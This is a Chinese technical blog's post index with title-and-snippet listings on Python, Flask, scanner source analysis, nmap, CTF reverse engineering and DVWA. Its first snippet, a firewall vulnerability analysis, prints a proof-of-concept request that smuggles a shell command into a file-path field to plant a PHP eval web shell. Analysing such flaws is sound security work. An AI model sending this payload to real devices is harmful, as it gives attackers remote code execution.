- 博客(32)
- 收藏
- 关注
RSS订阅原创 网康防火墙漏洞代码分析
poc分析POST /directdata/direct/router HTTP/1.1Host: X.X.X.X{ "action": "SSLVPN_Resource", "method": "deleteImage", "data":[{ "data":["/var/www/html/b.txt;echo '<?php @eval($_POST[a]);?>'>/var/www/html/test.php"] }], "ty
2021-05-31 14:26:48
976
5
原创 python--异常处理
1、什么是异常?异常即是一个事件,该事件会在程序执行过程中发生,影响了程序的正常执行。一般情况下,在Python无法正常处理程序时就会发生一个异常。异常是Python对象,表示一个错误。当Python脚本发生异常时我们需要捕获处理它,否则程序会终止执行。2、异常处理0x01: 使用try-except语句#没有异常处理num = int('abc')print(num) ...
2019-11-12 16:18:11
292
原创 巡风扫描器--nascan源码分析
nascan部分的结构:libinit.pycider.py: CIDR形式IP地址解析;common.py: 其它方法;icmp.py: ICMP消息发送类;log.py: 控制台信息输出;mongo.py: 数据库连接;scan.py: 扫描与识别;start.py: 线程控制;pluginmasscan.py :masscan调用脚本;nascan.py: 网络资...
2019-11-08 13:25:58
825
原创 巡风扫描器--web页面源码分析
1、view部分的结构lib:主程序依赖的库文件包;static:静态文件库;templates:模板文件库;init.py : app对象创建以及数据库初始化的python文件;view.py: app对象创建以及数据库初始化的python文件。2、登录界面def logincheck(f): @wraps(f) def wrapper(*args, **...
2019-10-30 21:01:56
586
原创 巡风扫描器--vulscan源码分析
vulscan部分的目录结构如下:vulscan里面包含的是扫描插件,有两种类型一是python脚本型插件,一是json文件型插件;vulscan代码分析1、程序开头sys.path.append(sys.path[0] + '/vuldb') sys.path.append(sys.path[0] + "/../")将 vuldb 目录和上级目录加入系统路径中;2、找到程序入口...
2019-10-27 21:31:15
891
原创 nmap常用参数的使用
一、常见服务对应端口端口扫描工具,借助工具可以了解所扫描IP提供的计算机网络服务类型(网络服务均与端口号相关),从而发现攻击弱点,常见服务对应端口号服务端口号HTTP80HTTPS443Talnet23FTP21SSH(安全登录)、SCP(文件传输)22SMTP25POP3110WebLogic7001TOMA...
2019-10-16 18:40:15
4957
原创 windows系统部署巡风扫描器
一、所需环境1、下载巡风的项目2、需要使用python2.7,在pycharm上使用python2.7的环境3、安装mongodb添加到系统环境变量中二、MongoDB部署1、安装mongodb: https://sec.ly.com/mirror/mongodb-win32-x86_64-2008plus-ssl-3.4.0-signed.msi2、将其添加到系统环境变量中3...
2019-10-13 16:16:38
600
原创 python--宏
1、介绍模板中宏跟python中的函数类似,可以传递参数,但是不能有返回值,可以将一些经常用到的代码片段放到宏中,然后把一些不固定的值取出来当成一个变量,使用宏的时候,参数可以为默认值。示例代码:(1)定义宏: {% macro input(name="",value="",type="text") %} <input type="{{ type }}" nam...
2019-08-08 13:55:06
9401
1
原创 python--时间的表示方式
1、什么是时间戳?时间戳是指格林威治时间自1970年1月1日(00:00:00 GMT)至当前时间的总秒数。它也被称为Unix时间戳(Unix Timestamp)。2、time的常用方法import time,datetime时间有三种展现方式:时间戳,时间元组,格式化的时间print(time.time())#当前时间戳>>> print(time.time())...
2019-08-06 09:31:18
1626
原创 Python--正则表达式
1、re.math函数re.math尝试从字符串的起始位置匹配一个模式,如果不是起始位置匹配成功的话,match()就返回none。语法:re.match(pattern,string,flags=0) pattern–匹配的正则表达式 string–要匹配的字符串 flags–标志位,用于控制正则表达式的匹配方式pattern–匹配的正则表达式 string–要匹配的字符串...
2019-08-02 09:08:42
209
原创 python--在电脑上配置python2和python3虚拟环境
1、分别安装python2.7和python3.6****为了区分是Python2还是Python3,把pytho32目录下的python.exe文件重命名为python3.exe,如下面截图所示:检验python2和python3是否安装成功:(1)python2(2)python32、pip的安装(1) pip是安装和管理python包的工具,通过pip来安装python包...
2019-08-01 20:41:05
227
原创 python--Flask学习(七)--利用Flask中的werkzeug.security模块加密
若将密码以明文的方式保存在数据库中是不安全的,可以使用一些如MD5的方式加密,但像这种加密方式也是存在安全隐患的,这里我们来学习一下利用Flask中的werkzeug.security模块加密。1、这种加密方式的原理:加密时混入一段“随机”字符串(盐值)再进行哈希加密。即使密码相同,如果盐值不同,那么哈希值也是不一样的。现在网站开发中主要是运用这种加密方法。2、这个模块主要是用到了两个函数...
2019-07-31 16:20:00
3119
3
原创 python--装饰器详解
1、什么是装饰器python装饰器(fuctional decorators)就是用于拓展原来函数功能的一种函数,目的是在不改变原函数名(或类名)的情况下,给函数增加新的功能。这个函数有两个特别之处:参数是一个函数;返回值是一个函数;2、为什么要使用装饰器一个简单的例子:def run(): print('run')run()要求:在执行这个函数之前先输出一个’he...
2019-07-26 11:15:00
113
原创 python--Flask学习(六)--flask-script和flask-migrate
1、flask_script的用法(1)Flask-script的作用是可以通过命令的形式来操作flask,例如通过命令跑一个开发版本的服务器、设置数据库,定时任务等。(2)如果直接在主‘manage.py’中写命令,那么在终端只需要输入python manage.py runserver就能执行。(3)如果把一些命令集合在一个文件中,那么终端就需要输入一个父命令,如:python mana...
2019-07-24 21:13:53
318
原创 python--Flask学习(五)--get和post请求、钩子函数
1、get请求和post请求(1)get请求使用场景:如果只对服务器获取请求,并没有对服务器产生任何影响,那么这时候使用get请求;传参:get请求传参是放在url中,通过’?'的形式来指定key和value的。(2)post请求使用场景:如果要对服务器产生影响,那么使用post请求;传参:post请求传参不是放在url中的,是通过’form data’的形式发送给服务...
2019-07-24 20:52:34
322
原创 python--Flask学习(四)--SQLAlchemy数据库
1、ORM与flask_SQLAlchemy的介绍(1)ORM:Object Relationship Mapping(模型关系映射);(2)flask_sqlalchemy是一套ORM框架;(3)ORM的好处:可以让我们操作数据库就跟操作对象一样,方便。 因为一个表可以抽象成一个类,一条数据抽象为一个对象。2、Flask_SQLAlchemy的使用(1)初始化和设置数据库配置信息:使...
2019-07-23 20:23:13
681
原创 python--Flask学习(三)Flask中的session操作
1、什么是seesionsession和cookie的作用有点类似,都是为了存储用户相关的信息。不同的是,cookie是存储在本地浏览器,而session存储在服务器。存储在服务器的数据会更加的安全,不容易被窃取。2、配置SECRET_KEY因为flask的session是通过加密之后放到了cookie中。所以有加密就有密钥用于解密,所以,只要用到了flask的session模块就一定要配置...
2019-07-20 19:41:05
2420
1
原创 python--Flask学习(二)--jinja2模板
1、渲染jinja2模板和传参(1)如何渲染模板模板放在’templates’文件夹下;从flask中导入’render_template’函数;在视图函数中,使用’render_template’函数渲染模板。**注意:**只需要填写模板的名字,不需要填写’templates’这个文件夹的路径。(2)模板传参数如果只有一个或少数参数,直接在’render_templa...
2019-07-19 17:42:47
952
原创 Python--Flask学习(一)--urls和视图
1、debug模式from flask import Flaskapp = Flask(__name__)# @app.route是一个装饰器# @开头,并且在函数上面,说明是装饰器,这个装饰器的作用,是做一个url与视图函数的映射@app.route('/')def hello_world(): return 'Hello World!'# 如果当前这个文件是作为入口程...
2019-07-19 10:02:55
449
原创 Python--Request库
1、Request库方法介绍2、GET请求import requestsr = requests.get('http://www.baidu.com')print(r.status_code)该代码实现了get请求输出了状态码。输出 200构造请求链接:利用params参数import requestspayload = {'key1':'value1','key2':'v...
2019-07-19 10:01:54
117
原创 7.27 pyc文件反编译到Python源码及base64模块在python中的应用
对 Python 加密时可能会有两种形式,一种是对Python转成的exe进行保护,另一种是直接对.py或者.pyc文件进行保护。 所以对这个.pyc文件我们直接在python在线反编译工具(https://tool.lu/pyc/) 打开,得到了如下的代码:#!/usr/bin/env python# visit http://tool.lu/pyc/ for more informat...
2018-07-27 20:25:35
626
原创 7.24 两道二进制题目练习的总结
1.兴趣是最好的老师 首先我们把根据PE文件的格式知道这个文件本身有错误,所以不能在IDA中打开,我们先把它在010Editor.exe中修改一下,我们把PE头改为50 45 00 00,然后就把它拉入IDA中,然后打开,找到有程序的开始进行分析。__int64 main_0(){ int v0; // edx __int64 v1; // ST00_8 int v3; /...
2018-07-27 16:03:36
2243
原创 7.26 二进制练习题
给你个礼物你能收到吗? 打开这个exe文件后,我们看到了它让我们输入礼物提取码,我们先随便输入数据,按回车显示提取码错误还有输错的次数,我们发现这里存在着一个循环。 然后我们在IDA里面打开这个文件int __cdecl main(int argc, const char **argv, const char **envp){ _main(); present(); ...
2018-07-27 10:08:49
3284
原创 7.23 010Editor.exe的使用
1.Editor目前功能如下: (1)纯文本编辑 (2)支持DOS与UNIX换行风格 (3)支持多种编码格式,自动探测Utf-8编码(根据文本内容前1K字节),对于非Utf-8编码格式的则以本地编码打开(对于中文Windows系统来说是GBK) (4)实时统计总字符数和光标选择范围字符数,并在状态栏上显示 (5)将文件拖入窗体即可打开 (6)最近文件列表显示最近打开的5个文件.为保护隐...
2018-07-26 21:16:41
19087
3
原创 7.22
1.二进制亦或的用法 (1)常用符号“”或“”来表示; (2)两个相“异或”的逻辑运算变量取值相同时,“异或”的结果为0。取值相异时,“异或”的结果为1 ; (3)异或运算法则 1. a ^ b = b ^ a 2. a ^ b ^ c = a ^ (b ^ c) = (a ^ b) ^ c; 3. d = a ^ b ^ c 可以推出 a = d ^ b ^ c. ...
2018-07-26 15:45:38
115
原创 7.25 逆向where is your flag
我们先在IDA里面打开这道题,打开之后使用shift+fn+f12查看字符串内容界面; 首先我们点击where is your flag这个,按f5键就会出来逆向的伪C语言程序了。 int __cdecl main(int argc, const char **argv, const char **envp) { if ( argc &amp;lt;= 1 ) { puts...
2018-07-26 15:37:54
643
7.18 burpsuite爆破登陆密码
1.burpsuite爆破登陆密码首先找到一个网站注册(1)首先在随便填入密码(12345),正确填入验证码,先不点击登录,然后用burp抓包 ,Proxy —> Intercept —Intercept is off/on这里:Intercept is off代表不抓包,Intercept is on抓包。设置Intercept is on时,点击需要抓取...
2018-07-26 09:53:02
3236
原创 7.16 虚拟机与nmap
1.虚拟机的安装与应用(1)首先,我们需要安装vmware虚拟机,我们先下载wmware安装包,然后我们双击打开安装包进行安装,具体安装步骤如图所示。(2) 然后我们双击打开安装好的虚拟机软件,进入虚拟机主页面,在主页面中会有创建新的虚拟机,打开虚拟机,连接远程服务器,连接到vmware vcloud air四个选项,我们点击主页面中的创建新的虚拟机选项开始创建虚拟机。 (3)...
2018-07-26 09:47:48
1822
原创 7.20 ctf题目练习
1.php代码审计 &amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;lt;?phpif (isset($_GET['name']) and isset($_GET['password'])) { if ($_GET['name'] == $_GET['password']) echo '&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;lt;p&
2018-07-26 09:45:42
1281
原创 7.17 DVWA的搭建及操作
1.搭建DVWA下载phpStudy(http://phpstudy.php.cn/)phpStudy是集成了Apache和MySql的集成环境,下载好安装phpStudy,运行时若显示缺少VC运行库32位的VC9:http://www.microsoft.com/zh-CN/download/details.aspx?id=558264位的VC9:http://www.microso...
2018-07-26 09:44:30
557
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人